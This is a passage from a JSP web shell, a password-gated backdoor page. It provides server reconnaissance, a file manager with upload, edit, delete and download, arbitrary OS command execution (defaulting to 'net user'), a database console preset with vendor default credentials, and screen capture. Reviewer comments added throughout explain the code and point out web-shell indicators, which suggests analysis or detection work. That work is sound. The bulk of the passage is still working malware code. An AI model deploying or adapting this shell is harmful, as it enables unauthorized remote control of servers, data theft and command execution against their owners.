 759                                 sRet += rs.getString(i);
 760                                 break;
 761
 762                             case Types.TIME:
 763                                 sRet += rs.getTime(i).toString();
 764                                 break;
 765
 766                             case Types.DATALINK:
 767                                 sRet += rs.getTimestamp(i).toString();
 768                                 break;
 769                             }
 770                             sRet += "        </td>\n";
 771                         }
 772                         sRet += "    </tr>\n";
 773                     }
 774                     sRet += "</table>\n";
 775
 776                     rs.close();
 777                 } else {
 778                     if (dbStatement.execute(sql)) {
 779                         sRet = orChinese("SQL execute success");
 780                     } else {
 781                         sRet = "<font color=\"red\">" + orChinese("SQL execute failed") + "</font>";
 782                     }
 783                 }
 784             } catch (SQLException e) {
 785                 sRet = "<font color=\"red\">" + orChinese("SQL execute failed") + "</font>";
 786             }
 787         }
 788
 789         return sRet;
 790     }
 791
  792     private void getScreenImg(HttpServletRequest request, HttpServletResponse response) throws Exception {
              // Captures the server's primary screen with java.awt.Robot and streams it to
              // the client as a JPEG with no-cache headers.  `request` is accepted but never
              // read.  Defender note: java.awt.Robot / Toolkit.getScreenSize() referenced
              // from a servlet or JSP is a strong web-shell indicator worth alerting on.
              // The declared "throws Exception" is moot: every failure is swallowed below.
  793         try{
                  // reset() discards any page output already buffered, so the response body
                  // consists of the image bytes only.  "image/jpg" is a non-standard type;
                  // the registered one is image/jpeg (browsers generally sniff it anyway).
  794             response.reset();
  795             response.setContentType("image/jpg");
  796             ServletOutputStream sos = response.getOutputStream();
  797             response.setHeader("Pragma", "No-cache");
  798             response.setHeader("Cache-Control", "no-cache");
  799             response.setDateHeader("Expires", 0);
                  // Full-screen rectangle of the default display.  On a headless server JVM
                  // getScreenSize() throws HeadlessException and new Robot() throws
                  // AWTException, so nothing is written and the client gets an empty reply.
  800             Dimension dimension = Toolkit.getDefaultToolkit().getScreenSize();
  801             BufferedImage screenshot = (new Robot())
  802                     .createScreenCapture(new Rectangle(0, 0, (int) dimension.getWidth(), (int) dimension.getHeight()));
  803             ByteArrayOutputStream bos = new ByteArrayOutputStream();
  804             ImageIO.write(screenshot, "jpg", bos);
  805             byte[] buf = bos.toByteArray();
  806             response.setContentLength(buf.length);
  807             sos.write(buf);
                  // Closed only on the success path: there is no finally block, so a failure
                  // after the output stream is obtained leaves `sos` to the container.
  808             bos.close();
  809             sos.close();
  810         }catch(Exception e){
                  // Empty catch: headless JVM, I/O failure or client disconnect are all
                  // dropped silently and the response may be truncated or empty.
  811         }
  812     }
 813
  814     public String getDriverInfo() {
              // Returns an HTML fragment with one "<path>&nbsp;(<free> Free, Total <total>)<br>"
              // entry per filesystem root reported by File.listRoots().  Despite the name
              // this describes drives / mount points, not drivers.  getSize() and
              // orChinese() are defined elsewhere in this file; getSize presumably formats
              // a byte count for display -- confirm.  Root paths come from the OS, not the
              // request, so the missing HTML escaping is a style point, not an injection.
  815         String str = "";
  816         File[] roots = File.listRoots();
  817         for (File file : roots) {
                  // Repeated String concatenation in a loop; StringBuilder is the idiomatic form.
  818             str += file.getPath() + "&nbsp;(";
  819             str += getSize(file.getFreeSpace()) + " " + orChinese("Free, Total") + " ";
  820             str += getSize(file.getTotalSpace()) + ")<br>";
  821         }
  822         return str;
  823     }%>
 824
 825 <html>
 826 <head>
 827 <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
 828 <style>
 829 body {font-size: 14px;font-family: 宋 体 ;color: white;background-color: black;text-align: center;padding: 5 5 5 5;}
 830 .trans {background: transparent;margin: 1 1 1 1;color: white;}
 831 input.textbox {border: black solid 1;font-size: 12px;height: 18px;}
 832 textarea {border: black solid 1;}
 833 table {border-collapse: collapse;}
 834 table.onhover tr:hover{background:red;}
 835 td {border: 1px dotted #FFF;height: 18px;}
 836 .break-all {word-break: break-all;}
 837 .oper {display: inline-block;float: left;width: 130px;border: 1px dotted #FFF;padding: 5px;margin-right: 3px;margin-bottom: 15px;height: 18px;cursor: hand;}
 838 .container {position: absolute;margin: 2 2 2 2;top: 68px;width: 95%;}
 839 a:link, a:visited {text-decoration: none;color: #FFF;}
 840 a:hover {text-decoration: underline;color: #FFF;}
 841
 842 </style>
 843 <script type="text/JavaScript">
 844     var pressKey = function() {
             // Submits the login form when Enter (keyCode 13) is pressed.  Relies on the
             // legacy global `window.event` (the handler takes no event parameter) and on
             // the IE-era `returnValue` / `cancel` properties to suppress the default action.
 845         if (event.keyCode == 13) {
 846             event.returnValue = false;
 847             event.cancel = true;
 848             loginForm.submit();
 849         }
 850     }
 851     var redirect = function(action) {
             // Stores `action` in the hidden #actionOption input and submits actionForm, so
             // every navigation tile posts back with action=<name>.
             // NOTE(review): the ‘…‘ quotes in this listing are typographic characters, not
             // ASCII apostrophes; the original source presumably used '...'.
 852         var actionOption = document.getElementById(‘actionOption‘);
 853         actionOption.value = action;
 854         actionForm.submit();
 855     }
 856     var createFile = function(url){
             // Navigates to `url` with the typed name appended as &fileName=...; the value
             // is not passed through encodeURIComponent, so names containing '&', '#' or
             // '%' will not round-trip to the server intact.
 857         var filename = document.getElementById(‘createFileName‘);
 858         window.location.href = url + "&fileName=" + filename.value;
 859     }
 860     var rename = function(url, msg, errormsg){
             // Prompts for a new name and navigates to url&newName=<input>; an empty or
             // cancelled prompt shows `errormsg` instead.  Same missing URL-encoding as createFile.
 861         var result = prompt(msg + ":" ,"")
 862         if (result){
 863             window.location.href=url + "&newName=" + result;
 864         }else{
 865             alert(errormsg);
 866         }
 867     }
 868     var dbsubmit = function(fsAction){
             // Appends &fsAction=<value> to #sqlform's action and submits it.  The `+=`
             // mutates the form's action attribute in place, so a second call on the same
             // page would append a second fsAction parameter.
 869         var form = document.getElementById("sqlform");
 870         form.action  += "&fsAction=" + fsAction;
 871         document.getElementById("sqlform").submit();
 872     }
 873     var languageChanged = function(url , oldurl){
             // Escapes '&' and '?' in `oldurl` with the {{and}} / {{question}} tokens that
             // the server-side "lang" branch reverses.  String.prototype.replace with a
             // string pattern substitutes only the FIRST occurrence, so an oldurl holding
             // several '&' characters is only partially escaped.
 874         oldurl = oldurl.replace("&","{{and}}").replace("?","{{question}}");
 875         url = url + "&oldurl=" + oldurl;
 876         window.location.href = url;
 877     }
 878 </script>
 879 <title><%=shellName %></title>
 880 </head>
 881 <body>
 882     <%
 883         session.setMaxInactiveInterval(sessionOutTime * 60);
 884         if (request.getParameter("myPassword") == null && session.getAttribute("myPassword") == null) {
 885             if (request.getParameter("lang") !=null){
 886                 language = request.getParameter("lang");
 887                 String oldurl = request.getParameter("oldurl");
 888                 String str = "<meta http-equiv=\"refresh\" content=\"0;url="+oldurl+"\" />";
 889                 out.println(str);
 890                 out.flush();
 891             }
 892     %>
 893     <font style="font-size: 300px; color: white"><% out.println(loginIcon); %></font>
 894     <form name="loginForm">
 895         <font size=4><%=welcomeMsg() %></font><br><br>
 896         <input class="textbox" size="30" name="myPassword" type="password" onkeydown="pressKey()" />
 897     </form>
 898     <%
 899         } else {
 900             String password = null;
 901             if (session.getAttribute("myPassword") == null) {
 902                 password = (String) request.getParameter("myPassword");
 903                 if (!myPassword.equals(password)) {
 904                     String rtnStr = "<div align=\"center\"><br><br><font color=\"red\">"+orChinese("Wrong Password")+"</font></div>";
 905                     rtnStr += "<meta http-equiv=\"refresh\" content=\"1;url=" + request.getRequestURL() + "\" />";
 906                     out.println(rtnStr);
 907                     out.flush();
 908                     //out.close();
 909                     return;
 910                 }
 911                 session.setAttribute("myPassword", password);
 912             } else {
 913                 password = (String) session.getAttribute("myPassword");
 914             }
 915
 916             String action = null;
 917             if (request.getParameter("action") == null)
 918                 action = "env";
 919             else
 920                 action = (String) request.getParameter("action");
 921
 922             if (action.equals("exit")) {
 923                 session.removeAttribute("myPassword");
 924                 response.sendRedirect(request.getRequestURI());
 925                 //out.close();
 926                 return;
 927             }
 928     %>
 929     <form name="actionForm">
 930         <input id="actionOption" type="hidden" name="action" value="Environment" />
 931     </form>
 932     <div style="margin-left: 2px">
 933         <div class="oper" onclick="redirect(‘env‘)"><%=orChinese("Environment")%></div>
 934         <div class="oper" onclick="redirect(‘file‘)" id="file_system"><%=orChinese("File Manager")%></div>
 935         <div class="oper" onclick="redirect(‘search‘)"><%=orChinese("File Search")%></div>
 936         <div class="oper" onclick="redirect(‘command‘)"><%=orChinese("Command")%></div>
 937         <div class="oper" onclick="redirect(‘database‘)"><%=orChinese("Database")%></div>
 938         <div class="oper" onclick="redirect(‘screen‘)"><%=orChinese("Screen Capture")%></div>
 939         <div class="oper" onclick="redirect(‘exit‘)"><%=orChinese("Logoff")%></div>
 940     </div>
 941     <%  if (action.equals("lang")){
 942         language =     request.getParameter("lang");
 943         String oldurl = request.getParameter("oldurl");
 944         if (oldurl!= null){
 945             oldurl = oldurl.replace("{{and}}", "&").replace("{{question}}", "?");
 946         }
 947         String sRet = "<meta http-equiv=\"refresh\" content=\"0;url="+oldurl+"\" />";
 948         %>
 949     <div class="container break-all"><%=sRet %></div>
 950     <%
 951     }else if (action.equals("env")) {
 952     %>
 953     <table class="container break-all onhover">
 954         <tr>
 955             <td width="20%"><%=orChinese("OS") %></td>
 956             <td width="80%"><%=System.getProperty("os.name") + " " + System.getProperty("os.version") + " "+ System.getProperty("os.arch")%></td>
 957         </tr>
 958         <tr>
 959             <td><%=orChinese("Computer Name") %></td>
 960             <td><%=System.getenv().get("COMPUTERNAME")%></td>
 961         </tr>
 962         <tr>
 963             <td><%=orChinese("Available Processors") %></td>
 964             <td><%=Runtime.getRuntime().availableProcessors() %></td>
 965         </tr>
 966         <tr>
 967             <td><%=orChinese("IP") %></td>
 968             <td><%=InetAddress.getLocalHost().getHostAddress().toString() %></td>
 969         </tr>
 970         <tr>
 971             <td><%=orChinese("System Driver") %></td>
 972             <td><%=System.getenv().get("SystemDrive")%></td>
 973         </tr>
 974         <tr>
 975             <td><%=orChinese("Driver Info") %></td>
 976             <td><%=getDriverInfo() %></td>
 977         </tr>
 978         <tr>
 979             <td><%=orChinese("User Name") %></td>
 980             <td><%=System.getenv().get("USERNAME")%></td>
 981         </tr>
 982         <tr>
 983             <td><%=orChinese("User Domain") %></td>
 984             <td><%=System.getenv().get("USERDOMAIN")%></td>
 985         </tr>
 986         <tr>
 987             <td><%=orChinese("User DNS Domain") %></td>
 988             <td><%=System.getenv().get("USERDNSDOMAIN")%></td>
 989         </tr>
 990         <tr>
 991             <td><%=orChinese("User Profile") %></td>
 992             <td><%=System.getenv().get("USERPROFILE")%></td>
 993         </tr>
 994         <tr>
 995             <td><%=orChinese("All User Profile") %></td>
 996             <td><%=System.getenv().get("ALLUSERSPROFILE")%></td>
 997         </tr>
 998         <tr>
 999             <td><%=orChinese("Temp") %></td>
1000             <td><%=System.getenv().get("TEMP")%></td>
1001         </tr>
1002         <tr>
1003             <td><%=orChinese("Program Files") %></td>
1004             <td><%=System.getenv().get("ProgramFiles")%></td>
1005         </tr>
1006         <tr>
1007             <td><%=orChinese("AppData") %></td>
1008             <td><%=System.getenv().get("APPDATA")%></td>
1009         </tr>
1010         <tr>
1011             <td><%=orChinese("System Root") %></td>
1012             <td><%=System.getenv().get("SystemRoot")%></td>
1013         </tr>
1014         <tr>
1015             <td><%=orChinese("Console") %></td>
1016             <td><%=System.getenv().get("ComSpec")%></td>
1017         </tr>
1018         <tr>
1019             <td><%=orChinese("File Executable") %></td>
1020             <td><%=System.getenv().get("PATHEXT")%></td>
1021         </tr>
1022         <tr>
1023             <td><%=orChinese("My Path") %></td>
1024             <td><%=request.getSession().getServletContext().getRealPath(request.getServletPath())%></td>
1025         </tr>
1026         <tr>
1027             <td><%=orChinese("User Dir") %></td>
1028             <td><%=System.getProperty("user.dir")%></td>
1029         </tr>
1030         <tr>
1031             <td><%=orChinese("Protocol") %></td>
1032             <td><%=request.getProtocol()%></td>
1033         </tr>
1034         <tr>
1035             <td><%=orChinese("Server Info") %></td>
1036             <td><%=application.getServerInfo()%></td>
1037         </tr>
1038         <tr>
1039             <td><%=orChinese("JDK Version") %></td>
1040             <td><%=System.getProperty("java.version")%></td>
1041         </tr>
1042         <tr>
1043             <td><%=orChinese("JDK Home") %></td>
1044             <td><%=System.getProperty("java.home")%></td>
1045         </tr>
1046         <tr>
1047             <td><%=orChinese("JVM Version") %></td>
1048             <td><%=System.getProperty("java.vm.specification.version")%></td>
1049         </tr>
1050         <tr>
1051             <td><%=orChinese("JVM Name") %></td>
1052             <td><%=System.getProperty("java.vm.name")%></td>
1053         </tr>
1054         <tr>
1055             <td><%=orChinese("Class Path") %></td>
1056             <td><%=System.getProperty("java.class.path")%></td>
1057         </tr>
1058         <tr>
1059             <td><%=orChinese("Java Library Path") %></td>
1060             <td><%=System.getProperty("java.library.path")%></td>
1061         </tr>
1062         <tr>
1063             <td><%=orChinese("Java tmpdir") %></td>
1064             <td><%=System.getProperty("java.io.tmpdir")%></td>
1065         </tr>
1066         <tr>
1067             <td><%=orChinese("Compiler") %></td>
1068             <td><%=System.getProperty("java.compiler") == null ? "" : System.getProperty("java.compiler")%></td>
1069         </tr>
1070         <tr>
1071             <td><%=orChinese("Java ext dirs") %></td>
1072             <td><%=System.getProperty("java.ext.dirs")%></td>
1073         </tr>
1074         <tr>
1075             <td><%=orChinese("Remote Addr") %></td>
1076             <td><%=request.getRemoteAddr()%></td>
1077         </tr>
1078         <tr>
1079             <td><%=orChinese("Remote Host") %></td>
1080             <td><%=request.getRemoteHost()%></td>
1081         </tr>
1082         <tr>
1083             <td><%=orChinese("Remote User") %></td>
1084             <td><%=request.getRemoteUser() == null ? "" : request.getRemoteUser()%></td>
1085         </tr>
1086         <tr>
1087             <td><%=orChinese("Scheme") %></td>
1088             <td><%=request.getScheme()%></td>
1089         </tr>
1090         <tr>
1091             <td><%=orChinese("Secure") %></td>
1092             <td><%=request.isSecure() == true ? orChinese("Yes") : orChinese("No") %></td>
1093         </tr>
1094     </table>
1095     <%
1096         }
1097         if (action.equals("file")) {
1098             String curPath = "";
1099             String result = "";
1100             String fsAction = "";
1101             if (request.getParameter("curPath") == null) {
1102                 curPath = request.getSession().getServletContext().getRealPath(request.getServletPath());
1103                 curPath = pathConvert((new File(curPath)).getParent());
1104             }
1105             else {
1106                 curPath = Unicode2GB((String)request.getParameter("curPath"));
1107                 curPath = pathConvert(curPath);
1108             }
1109             if (request.getParameter("fsAction") == null) {
1110                 fsAction = "list";
1111             } else {
1112                 fsAction = (String)request.getParameter("fsAction");
1113             }
1114             if (fsAction.equals("list")){
1115             %>
1116     <div class="container">
1117         <form method="post" name="form3" action="<%= request.getRequestURI() + "?action=file"%>">
1118             <div align="left">
1119
1120                 <input type="text" class="trans" size="100" name="curPath" value="<%=curPath%>" /> <input type="submit" value="<%=orChinese("GOTO") %>"
1121                     class="trans" /> <input type="button" value="<%=orChinese("Home") %>" class="trans"
1122                     onclick="javascript:document.getElementById(‘file_system‘).click();" />
1123                 <%
1124                 String os = System.getProperties().getProperty("os.name");
1125                 if (os.toUpperCase().contains("WIN")){
1126                     File[] files = File.listRoots();
1127                     for(int i = 0; i < files.length; i++) {
1128                            %>
1129                 <input type="button" class="trans"
1130                     onclick="javascript:window.location.href=‘<%= request.getRequestURI() + "?action=file&curPath=" + files[i].getPath().replace("\\", "/")%>‘"
1131                     value="<%= files[i]%>" />
1132                 <%
1133                     }
1134                 }
1135                 %>
1136
1137             </div>
1138             <table class="onhover" style="width: 100%">
1139                 <tr>
1140                     <td align="center"><%=orChinese("File Name") %></td>
1141                     <td align="center" width="10%"><%=orChinese("Size") %></td>
1142                     <td align="center" width="38%"><%=orChinese("Operation") %></td>
1143                 </tr>
1144                 <tr>
1145                     <%
1146                     File curFolder = new File(curPath);
1147                 %>
1148                     <td><a href="<%=request.getRequestURI() %>?action=file&curPath=<%=curFolder.getParent() %>">[..]</a></td>
1149                     <td align="right"></td>
1150                     <td></td>
1151                 </tr>
1152                 <%
1153                 for (File file : this.getFolderList(curPath)){
1154                     MyFile f = new MyFile(file.getAbsolutePath(),request.getRequestURI()+"?action=file&curPath=" +curPath );
1155                     f.setHtmlOperation(Operation.Rename,Operation.Delete,Operation.Download);
1156                     %>
1157                 <tr>
1158                     <td><a href="<%=request.getRequestURI() %>?action=file&curPath=<%=f.getAbsolutePath() %>">[<%=f.getName() %>]
1159                     </a></td>
1160                     <td align="right"><%=f.getLength() %></td>
1161                     <td><%=f.getHtmlOperation() %></td>
1162                 </tr>
1163                 <%
1164                 }
1165                 for (File file : this.getFileList(curPath)){
1166                     MyFile f = new MyFile(file.getAbsolutePath(),request.getRequestURI()+"?action=file&curPath=" +curPath );
1167                     f.setHtmlOperation(Operation.Edit,Operation.Rename,Operation.Delete,Operation.Download);
1168                     %>
1169                 <tr>
1170                     <td><%=f.getName() %></td>
1171                     <td align="right"><%=f.getLength() %></td>
1172                     <td><%=f.getHtmlOperation() %></td>
1173                 </tr>
1174                 <%
1175                 }
1176                 %>
1177             </table>
1178             <div align="left">
1179                 <table style="width: 100%;">
1180                     <tr>
1181                         <td align="left" style="border: 0">
1182                             <input type="text" name="uploadFilePath" id="uploadFilePath" size="60" class="trans" />
1183                             <input type="button" value="<%=orChinese("Select")%>" class="trans" onclick="javascript:document.getElementById(‘fileSelect‘).click()">
1184                             <input type="button" value="<%=orChinese("Upload")%>" class="trans" onclick="javascript:document.getElementById(‘uploadform‘).submit()" />
1185                         </td>
1186                         <td align="right" style="border: 0">
1187                             <input type="text" id="createFileName" class="trans" size="26" name="fileName" />
1188                             <input type="button" class="trans" value="<%=orChinese("Create File")%>" onclick=‘createFile("<%=request.getRequestURI() + "?action=file&curPath=" + curPath + "&fsAction=createFile"%>")‘>
1189                             <input type="button" class="trans" value="<%=orChinese("Create Folder")%>" onclick=‘createFile("<%=request.getRequestURI() + "?action=file&curPath=" + curPath + "&fsAction=createFolder"%>")‘>
1190                         </td>
1191                     </tr>
1192                 </table>
1193             </div>
1194         </form>
1195         <div align="left">
1196             <form id="uploadform" name="upload" enctype="multipart/form-data" method="post"
1197                 action="<%=request.getRequestURI() + "?action=file&curPath=" + curPath + "&fsAction=upload"%>">
1198                 <input type="file" style="display: none" name="upFile" id="fileSelect"
1199                     onchange="javascript:document.getElementById(‘uploadFilePath‘).value=this.value" />
1200             </form>
1201         </div>
1202     </div>
1203
1204     <%
1205             }else if (fsAction.equals("Edit")){
1206                 if (request.getParameter("fileName") == null) {
1207                     result = "<div class=\"container\"><font color=\"red\">"+orChinese("Folder name is null")+"</font></div>";
1208                 } else {
1209                     String fileName = Unicode2GB(request.getParameter("fileName").trim());
1210                     result = openFile(curPath, fileName, request.getRequestURI() + "?action=" + action);
1211                 }
1212             }else if (fsAction.equals("save")) {
1213                  if (request.getParameter("fileContent") == null) {
1214                     result = "<font color=\"red\">"+orChinese("Content is null")+"</font>";
1215                 } else {
1216                     if (request.getParameter("fileName") == null) {
1217                         result = "<div class=\"container\"><font color=\"red\">"+orChinese("Folder name is null")+"</font></div>";
1218                     } else {
1219                         String fileName = Unicode2GB(request.getParameter("fileName").trim());
1220                         String fileContent = Unicode2GB((String)request.getParameter("fileContent"));
1221                         result = saveFile(curPath, fileName, request.getRequestURI() + "?action=" + action, fileContent);
1222                     }
1223                 }
1224             } else if (fsAction.equals("createFolder")) {
1225                 if (request.getParameter("fileName") == null) {
1226                     result = "<div class=\"container\"><font color=\"red\">"+orChinese("Folder name is null")+"</font></div>";
1227                 } else {
1228                     String folderName = Unicode2GB(request.getParameter("fileName").trim());
1229                     if (folderName.equals("")) {
1230                         result = "<div class=\"container\"><font color=\"red\">"+orChinese("Folder name is null")+"</font></div>";
1231                     } else {
1232                         result = createFolder(curPath,folderName,request.getRequestURI() + "?action=" + action);
1233                     }
1234                 }
1235             } else if (fsAction.equals("createFile")) {
1236                  if (request.getParameter("fileName") == null) {
1237                     result = "<div class=\"container\"><font color=\"red\">"+orChinese("File name is null")+"</font></div>";
1238                 } else {
1239                     String fileName = Unicode2GB(request.getParameter("fileName").trim());
1240                     if (fileName.equals("")) {
1241                         result = "<div class=\"container\"><font color=\"red\">"+orChinese("File name is null")+"</font></div>";
1242                     } else {
1243                         result = createFile(curPath,fileName,request.getRequestURI() + "?action=" + action);
1244                     }
1245                 }
1246             } else if (fsAction.equals("Delete")) {
1247                 String fileName= Unicode2GB(request.getParameter("fileName").trim());
1248                 result = deleteFile(curPath,fileName,request.getRequestURI() + "?action=" + action);
1249             } else if (fsAction.equals("upload")) {
1250                 result = uploadFile(request, curPath, request.getRequestURI() + "?action=" + action);
1251             } else if (fsAction.equals("Rename")) {
1252                 String newName = Unicode2GB(request.getParameter("newName").trim());
1253                 String fileName = Unicode2GB(request.getParameter("fileName").trim());
1254                 result = rename(curPath,fileName,newName,request.getRequestURI() + "?action=" + action);
1255             } else if (fsAction.equals("Download")) {
1256                 String fileName= Unicode2GB(request.getParameter("fileName").trim());
1257                 result = download(curPath,fileName,request.getRequestURI() + "?action=" + action, response);
1258             }
1259             %>
1260     <div class="container">
1261         <font color="red"><%=result %></font>
1262     </div>
1263     <%
1264         }
1265         if (action.equals("search")) {
1266             String curPath = request.getSession().getServletContext().getRealPath(request.getServletPath());
1267             curPath = pathConvert((new File(curPath)).getParent());
1268
1269             String searchpath = Unicode2GB(request.getParameter("searchpath"));
1270             if (searchpath == null || searchpath.trim().length() == 0){
1271                 searchpath = curPath;
1272             }
1273             String searchsubfix = Unicode2GB(request.getParameter("searchsubfix"));
1274             if (searchsubfix == null || searchsubfix.trim().length() == 0){
1275                 searchsubfix = ".jsp .html .htm";
1276             }
1277             String searchby = request.getParameter("searchby");
1278             String ignorecase = request.getParameter("ignorecase");
1279             String searchcontent = Unicode2GB(request.getParameter("searchcontent"));
1280             if (searchcontent == null || searchcontent.trim().length() == 0){
1281                 searchcontent = "index";
1282             }
1283             String fsAction = request.getParameter("fsAction");
1284             String searchResult = "";
1285             if (fsAction != null){
1286                 searchResult = searchFile(searchpath, searchcontent , searchsubfix, "name".equals(searchby),"yes".equals(ignorecase));
1287             }
1288     %>
1289     <form class="container" name="searchForm" method="post" action="<%=request.getRequestURI() + "?action=search&fsAction=search"%>">
1290         <table>
1291             <tr>
1292                 <td width="260px" align="right"><%=orChinese("Search from") %>:</td>
1293                 <td><input type="text" id="searchpath" class="trans" name="searchpath" size="100" value="<%=searchpath %>" /></td>
1294             </tr>
1295             <tr>
1296                 <td align="right"><%=orChinese("Search for file type") %>:</td>
1297                 <td><input type="text" id="searchsubfix" class="trans" name="searchsubfix" size="100" value="<%=searchsubfix %>" /></td>
1298             </tr>
1299             <tr>
1300                 <td align="right"><%=orChinese("Setting") %>:</td>
1301                 <td>
1302                     <%
1303                     if ("content".equals(searchby)){
1304                         %> <input type="radio" class="trans" name="searchby" value="name" /><%=orChinese("Search by Name") %> <input type="radio" name="searchby"
1305                     class="trans" value="content" checked="checked" /><%=orChinese("Search by Content") %> <%
1306                     }else{
1307                         %> <input type="radio" class="trans" name="searchby" value="name" checked="checked" /><%=orChinese("Search by Name") %> <input type="radio"
1308                     name="searchby" class="trans" value="content" /><%=orChinese("Search by Content") %> <%
1309                     }
1310                     if ("yes".equals(ignorecase)){
1311                         %> <input type="checkbox" name="ignorecase" class="trans" value="yes" checked="checked" /><%=orChinese("Ignore Case") %> <%
1312                     }else{
1313                         %> <input type="checkbox" name="ignorecase" class="trans" value="yes" /><%=orChinese("Ignore Case") %> <%
1314                     }
1315                     %>
1316                 </td>
1317             </tr>
1318             <tr>
1319                 <td align="right"><%=orChinese("Search keyword") %>:</td>
1320                 <td><input type="text" id="searchcontent" class="trans" name="searchcontent" size="40" value="<%=searchcontent %>" /> <input type="submit"
1321                     value="<%=orChinese("Search") %>" class="trans" /></td>
1322             </tr>
1323             <tr>
1324                 <td colspan="2" align="left" id="searchresult"><%=searchResult %></td>
1325             </tr>
1326         </table>
1327     </form>
1328     <%
1329         }
1330         if (action.equals("command")) {
1331             String cmd = "";
1332             InputStream ins = null;
1333             String result = "";
1334
1335             if (request.getParameter("command") != null) {
1336                 cmd = (String)request.getParameter("command");
1337                 result = exeCmd(cmd);
1338             }
1339     %>
1340     <form class="container" name="form2" method="post" action="<%=request.getRequestURI() + "?action=command"%>">
1341         <%
1342         if (cmd==null || "".equals(cmd.trim())){
1343             if (System.getProperty("os.name").toLowerCase().contains("windows")){
1344                 cmd = "cmd.exe /c net user";
1345             }else{
1346                 cmd = "uname -a";
1347             }
1348         }
1349     %>
1350         <div align="left">
1351             <input type="text" size="130" class="trans" size="133" name="command" value="<%=cmd%>" /> <input type="submit" class="trans"
1352                 value="<%=orChinese("Execute") %>" />
1353         </div>
1354         <table style="width: 100%; height: 100px">
1355             <tr>
1356                 <td><%=result == "" ? "&nbsp;" : result%></td>
1357             </tr>
1358         </table>
1359     </form>
1360     <%
1361         }
1362         if (action.equals("database")) {
             // action=database: the sub-action is chosen by the `fsAction` parameter:
             //   null / "typeChange" -> fill in vendor defaults for the chosen dbType
             //   "connect"           -> load the driver class and open a connection
             //   "disconnect"        -> close the page-level statement and connection
             //   "execute"           -> run `sql` through DBExecute()
             // Unicode2GB(), DBConnect() and DBExecute() are defined outside this view.
             // `conn` and `dbStatement` are fields of the page's `<%! %>` declaration
             // block, so one connection is shared by every request to this page.
1363             String SQLResult = "";
1364             String dbType = request.getParameter("dbType");
1365             dbType = dbType == null?"Mysql":dbType;
             // `driver` and `port` are read raw; the other fields pass through Unicode2GB().
1366             String driver = request.getParameter("driver");
1367             String port = request.getParameter("port");
1368             String dbname = Unicode2GB(request.getParameter("dbname"));
1369             String host = Unicode2GB(request.getParameter("host"));
1370             String sql = Unicode2GB(request.getParameter("sql"));
1371             String dbuser = Unicode2GB(request.getParameter("dbuser"));
1372             String dbpass = Unicode2GB(request.getParameter("dbpass"));
1373             String fsAction = request.getParameter("fsAction");
1374             String connurl = Unicode2GB(request.getParameter("connurl"));
1375             if (sql==null) sql="";
             // Per-vendor defaults: driver class, port, a vendor default account, and a
             // database name. For "Other" only driver, connurl and credentials are reset;
             // host, port and dbname keep whatever was submitted (null on first load).
1376             if (fsAction == null || "typeChange".equals(fsAction)){
1377                 if ("Mysql".equalsIgnoreCase(dbType)){
1378                     driver = "com.mysql.jdbc.Driver";
1379                     port = "3306";
1380                     dbuser = "root";
1381                     dbpass = "root";
1382                     host = "localhost";
1383                     dbname = "mysql";
1384                 }else if("Oracle".equalsIgnoreCase(dbType)){
1385                     driver = "oracle.jdbc.driver.OracleDriver";
1386                     port = "1521";
1387                     dbuser = "scott";
1388                     dbpass = "tiger";
1389                     host = "localhost";
1390                     dbname = "orcl";
1391                 }else if("SQLServer".equalsIgnoreCase(dbType)){
1392                     driver = "com.microsoft.jdbc.sqlserver.SQLServerDriver";
1393                     port = "1433";
1394                     dbuser = "sa";
1395                     dbpass = "123456";
1396                     host = "localhost";
1397                     dbname = "master";
1398                 }else if("DB2".equalsIgnoreCase(dbType)){
1399                     driver = "com.ibm.db2.jdbc.app.DB2Driver";
1400                     port = "5000";
1401                     dbuser = "db2admin";
1402                     dbpass = "123456";
1403                     host = "localhost";
1404                     dbname = "";
1405                 }else if("Other".equalsIgnoreCase(dbType)){
1406                     driver = "sun.jdbc.odbc.JdbcOdbcDriver";
1407                     connurl = "jdbc:odbc:dsn=dsnName;User=username;Password=password";
1408                     dbuser = "";
1409                     dbpass = "";
1410                 }
1411             }else if("connect".equals(fsAction)){
                 // Class.forName() loads whatever class name arrived in the `driver`
                 // parameter. The checked ClassNotFoundException is not handled in this
                 // branch; presumably an enclosing try outside this view catches it — confirm.
1412                 if (driver!=null){
1413                     Class.forName(driver);
                     // Every URL below hard-codes the literal "localhost"; the `host`
                     // value read above is not referenced in any of these branches.
1414                     if ("Mysql".equalsIgnoreCase(dbType)){
1415                         connurl = "jdbc:mysql://localhost:"+port+"/" + dbname;
1416                     }else if("Oracle".equalsIgnoreCase(dbType)){
                         // NOTE(review): "[email protected]" reads like an extraction artefact of
                         // this listing rather than the original literal — as shown it does not
                         // look like a usable JDBC URL; confirm against the source file.
1417                         connurl = "jdbc:oracle:[email protected]:"+port+":"+ dbname;
1418                     }else if("SQLServer".equalsIgnoreCase(dbType)){
1419                         connurl = "jdbc:sqlserver://localhost:"+port+";databaseName=" + dbname;
1420                     }else if("DB2".equalsIgnoreCase(dbType)){
1421                         connurl = "jdbc:db2://localhost:"+port+"/" + dbname;
1422                     }
                     // For "Other" connurl stays as submitted and is passed through unchanged.
1423                     SQLResult = this.DBConnect(connurl, dbuser, dbpass);
1424                 }
1425             }else if("disconnect".equals(fsAction)){
1426                 try {
1427                     if (dbStatement != null) {
1428                         dbStatement.close();
1429                         dbStatement = null;
1430                     }
1431                     if (conn != null) {
1432                         conn.close();
1433                         conn = null;
1434                     }
1435                 } catch (SQLException e) {
                     // A SQLException from close() is swallowed silently; if the statement's
                     // close() throws, `dbStatement` stays non-null and `conn` is never closed.
1436
1437                 }
1438             }else if("execute".equals(fsAction)){
1439                 SQLResult = DBExecute(sql);
1440             }
1441     %>
1442     <form class="container" id="sqlform" name="sqlform" method="post" action="<%=request.getRequestURI() + "?action=database"%>">
1443         <table style="width: 100%;">
1444             <tr>
1445                 <td align="right" width="15%"><%=orChinese("Database Type") %>:</td>
         <%-- The characters wrapping the dbsubmit() argument here and in the buttons
              below (‘…‘) look like mis-encoded single quotes from the listing's
              extraction; the inline JavaScript is only valid with plain ASCII quotes —
              confirm against the source file. --%>
1446                 <td align="left" width="85%"><select id="dbtype_select" name=dbType style="background-color: black; color: white"
1447                     onchange="dbsubmit(‘typeChange‘)">
         <%-- One full <option> list per dbType so the current choice is pre-selected;
              no list is rendered when dbType matches none of the five values. --%>
1448                         <%
1449                         if ("Mysql".equalsIgnoreCase(dbType)){
1450                             %>
1451                         <option value="Mysql" selected="selected">Mysql</option>
1452                         <option value="Oracle">Oracle</option>
1453                         <option value="SQLServer">SQLServer</option>
